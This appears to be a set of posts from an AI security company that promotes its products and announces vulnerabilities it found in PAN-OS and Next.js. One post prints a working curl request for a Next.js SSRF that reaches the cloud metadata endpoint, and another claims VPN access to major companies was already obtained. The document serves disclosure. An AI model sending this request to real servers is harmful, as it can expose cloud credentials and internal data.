Hacktron is an autonomous vulnerability hunter for ambitious engineering teams. Built by world-class security researchers. Powered by one principle: PoC || GTFO
Introducing Hacktron Review: an AI security reviewer for your pull requests.
It understands your whole codebase, builds a threat model, takes your feedback, and catches exploitable vulnerabilities before they reach production.
Try for free: https://t.co/ZHfG7cvXRe
Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle.
AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.
The outcome: a faster, more cost-effective security assessment that does not compromise on quality. This is not just checkbox compliance. Hacktron Whitebox helps teams generate evidence for SOC 2 and ISO 27001, while giving engineers valuable, actionable findings they can fix.
Nice overview of the vulnerability discovery landscape! Very proud of the work we've done at @HacktronAI, as well as that of our peers at Anthropic and AISLE.
AI has sped up vulnerability discovery, but coverage and signal remain important metrics we optimize for.
Hacktron Review plugs into your pull requests and catches exploitable vulnerabilities other scanners walk straight past.
Find real security issues within 24 hours of onboarding.
Try it free → https://t.co/hkx1I3nkgE
When Your VPN Opens Your Private Network to the Public!
An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN.
Blog - https://t.co/xMBbKC60NZ
This is a critical auth bypass (affecting GlobalProtect VPN); not sure why this was marked as high. I have already managed to get VPN access to major corps!
Unlike the buffer overflow, this isn't limited to PAN-OS.
Will be disclosing full details later next week on @HacktronAI blog.
https://t.co/iby50nmGdF
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI
CVE-2026-44578: SSRF via WebSocket upgrade.
It is the most impactful of all: it lets an attacker read from internal hosts, such as cloud metadata endpoints, via self-hosted Next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
"http://target:3000" \
--request-target "http://169.254.169.254/latest/meta-data/"
I've seen enough fundraising announcement videos. This isn’t one of them.
At @HacktronAI, we do security, and we do it well. That’s what matters to us. We solve real problems for our customers. On average, they uncover real vulnerabilities missed by other tools within 24 hours of onboarding.
Just this year, we've already responsibly disclosed vulnerabilities in Vercel's Next.js, Grafana, JetBrains' YouTrack, OpenAM, Metabase, and BeyondTrust's Remote Support Software.
No unearned, bullshit hype. Just security that works.
Hacktron ❤️ Open Source
TL;DR: If you maintain an open source project, we want to give you Hacktron Review for free.
Because giving maintainers the same capabilities attackers would otherwise use against them felt like the right thing to do.
https://t.co/fBHnQwhU8S
Next.js v16.2.5 fixes a bunch of vulnerabilities reported by @HacktronAI.
Patch ASAP, especially if you're running self-hosted Next.js, as the SSRF might affect you.
CVE-2026-44574: Middleware / Proxy bypass via dynamic route parameter injection
CVE-2026-44578: SSRF in applications using WebSocket upgrades
CVE-2026-44581: XSS in App Router applications using CSP nonces
When react2shell hit last year, I think Vercel handled it brilliantly.
To protect their users, they paid $50,000 for every bypass researchers could find. We decided to participate, and ended up earning $170,000.
read how we did it here: https://t.co/2dM6Mf9PHU
TL;DR: If a large model finds a 0day with 90% probability, and a small model with 50% probability, but the small model costs 10x less, it is better to use the small model.
Mythos showed that frontier models can find complex vulnerabilities with a skilled operator in the loop.
But for applications that don't have the complexity of a JIT compiler, we found that smaller models run repeatedly can outperform larger frontier models on cost-to-recall.
https://t.co/mr6ROAaXdg
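The cost-to-recall argument above, as an added worked example (not Hacktron's code or data): it models each run as an independent trial with the post's 90%/50% probabilities and 10x cost ratio, and adds a `ceiling` parameter (an assumption introduced here, not in the post) for the share of bugs a small model can find at all, which is where the JIT-compiler caveat bites.

```python
import math
from typing import Optional

# Added example, not Hacktron's code. Every run is modelled as an independent
# trial; real repeated runs are correlated, so these figures are optimistic.
# `ceiling` (an assumption introduced here) is the fraction of bugs a model
# can find at all; repetition never lifts recall above it.

def recall_after_runs(p_run: float, runs: int, ceiling: float = 1.0) -> float:
    """Probability that at least one of `runs` attempts finds the bug."""
    return ceiling * (1.0 - (1.0 - p_run) ** runs)

def runs_to_reach(p_run: float, target: float, ceiling: float = 1.0) -> Optional[int]:
    """Fewest runs whose recall reaches `target`; None if the ceiling forbids it."""
    if target >= ceiling:
        return None
    return math.ceil(math.log(1.0 - target / ceiling) / math.log(1.0 - p_run))

def compare_at_budget(budget: float, p_large: float, cost_large: float,
                      p_small: float, cost_small: float,
                      small_ceiling: float = 1.0) -> dict:
    """Spend the same budget on each model and report the recall each buys."""
    runs_large = int(budget // cost_large)
    runs_small = int(budget // cost_small)
    r_large = recall_after_runs(p_large, runs_large)
    r_small = recall_after_runs(p_small, runs_small, small_ceiling)
    return {
        "large": {"runs": runs_large, "recall": r_large},
        "small": {"runs": runs_small, "recall": r_small},
        "small_wins": r_small > r_large,
    }

if __name__ == "__main__":
    # The post's numbers: large 90% per run at cost 10, small 50% per run at cost 1.
    res = compare_at_budget(10, p_large=0.9, cost_large=10, p_small=0.5, cost_small=1)
    print(f"budget 10: large recall {res['large']['recall']:.3f}, "
          f"small recall {res['small']['recall']:.4f} over {res['small']['runs']} runs")
    k = runs_to_reach(0.5, target=0.9)
    print(f"small model matches 90% after {k} runs, i.e. cost {k} vs 10")
    # Complex target (JIT-compiler class): the small model can only ever reach
    # 30% of the bugs, so no number of cheap runs catches up.
    capped = compare_at_budget(10, 0.9, 10, 0.5, 1, small_ceiling=0.3)
    print(f"with ceiling 0.3: small recall {capped['small']['recall']:.3f}, "
          f"small_wins={capped['small_wins']}")
```

Under the independence assumption the small model reaches the large model's 90% after four runs, at 40% of the cost; once a ceiling below 90% is imposed, no amount of repetition closes the gap.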